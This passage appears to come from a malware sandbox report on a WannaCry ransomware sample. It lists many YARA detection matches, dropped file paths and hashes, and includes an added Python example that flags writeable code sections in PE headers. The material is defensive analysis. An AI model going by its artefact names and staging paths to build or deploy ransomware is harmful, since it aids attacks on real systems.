Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (based on rule by US CERT)
Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 11.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 11.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 11.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (based on rule by US CERT)
Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (based on rule by US CERT)
Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (based on rule by US CERT)
Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (based on rule by US CERT)
Source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
              Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 11.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 11.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 11.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 11.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 11.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 11.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 11.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 11.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 11.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 11.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 0000001D.00000000.347152674.000000000040E000.00000008.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 00000006.00000000.272335422.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 0000000B.00000000.278856067.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 00000004.00000000.263749691.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 00000006.00000002.357943271.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 00000004.00000000.265483719.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 00000004.00000000.267432086.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: mssecsvc.exe.2.dr; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FjYNZSPNkt.dll; Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
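The writeable .text section reported above (IMAGE_SCN_MEM_WRITE set on a section that also carries IMAGE_SCN_CNT_CODE and IMAGE_SCN_MEM_EXECUTE) is a cheap static indicator of self-modifying or file-infected code, and the COFF characteristics on the line after it are read from the same header. The following Python is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: it parses the DOS header, COFF header and section table with the standard library only, decodes both flag sets, and flags any code section that is also writeable. The PE bytes it runs over are constructed inline by build_pe() (a header-only image for testing, not a loadable executable) rather than taken from the sample; the flag values are the winnt.h constants.

```python
import struct

# Section header Characteristics bits (winnt.h)
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SCN_FLAG_NAMES = {
    IMAGE_SCN_CNT_CODE: "CNT_CODE",
    IMAGE_SCN_MEM_EXECUTE: "MEM_EXECUTE",
    IMAGE_SCN_MEM_READ: "MEM_READ",
    IMAGE_SCN_MEM_WRITE: "MEM_WRITE",
}

# COFF file header Characteristics bits (winnt.h), the ones the report lists
FILE_FLAG_NAMES = {
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}


def flag_names(value, table):
    """Decode a bitmask into the flag names of `table`, lowest bit first."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe(data):
    """Return (file_characteristics, [(section_name, characteristics), ...]).

    Walks MZ header -> e_lfanew -> 'PE\\0\\0' -> COFF header -> optional
    header (skipped by SizeOfOptionalHeader) -> 40-byte section headers.
    """
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    (_machine, nsect, _ts, _psym, _nsym, opt_size, file_chars) = struct.unpack_from(
        "<HHIIIHH", data, coff)
    sect_off = coff + 20 + opt_size
    sections = []
    for i in range(nsect):
        off = sect_off + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        (chars,) = struct.unpack_from("<I", data, off + 36)  # Characteristics field
        sections.append((name, chars))
    return file_chars, sections


def writable_code_sections(data):
    """Names of sections that are code/executable AND writeable (the report's finding)."""
    _, sections = parse_pe(data)
    code = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE
    return [n for n, c in sections if (c & code) and (c & IMAGE_SCN_MEM_WRITE)]


def build_pe(sections, file_chars=0x210E):
    """Construct a minimal PE32 header image for testing (not loadable by Windows).

    sections: list of (name, characteristics). Default file_chars is the
    EXECUTABLE_IMAGE|LINE_NUMS_STRIPPED|LOCAL_SYMS_STRIPPED|32BIT_MACHINE|DLL set
    the report shows for FjYNZSPNkt.dll.
    """
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)  # 64 bytes
    opt = struct.pack("<H", 0x10B) + b"\0" * (224 - 2)              # PE32 magic, rest zero
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), file_chars)
    table = b""
    for name, chars in sections:
        table += name.encode().ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", 0x1000, 0x1000, 0x200, 0x400, 0, 0, 0, 0, chars)
    return dos + b"PE\0\0" + coff + opt + table


if __name__ == "__main__":
    # Constructed sample mimicking the report: .text is CODE|EXECUTE|READ|WRITE.
    suspicious = build_pe([(".text", 0xE0000020), (".data", 0xC0000040)])
    fchars, sects = parse_pe(suspicious)
    print("file:", flag_names(fchars, FILE_FLAG_NAMES))
    for n, c in sects:
        print(f"{n:8s} {flag_names(c, SCN_FLAG_NAMES)}")
    print("writeable code sections:", writable_code_sections(suspicious))
```

To run it against a real file, pass `open(path, "rb").read()` to `writable_code_sections`; a RWX .text is normal for some packers, so treat a hit as a triage signal and not as a verdict on its own.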
Source: FjYNZSPNkt.dll, type: SAMPLE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: FjYNZSPNkt.dll, type: SAMPLE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 29.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 29.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 29.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 29.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 29.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 29.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE; Matched rule: wanna_cry_ransomware_generic (date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set)
Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE; Matched rule: Win32_Ransomware_WannaCry (tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware)
Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: WannaCry_Ransomware (date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T)
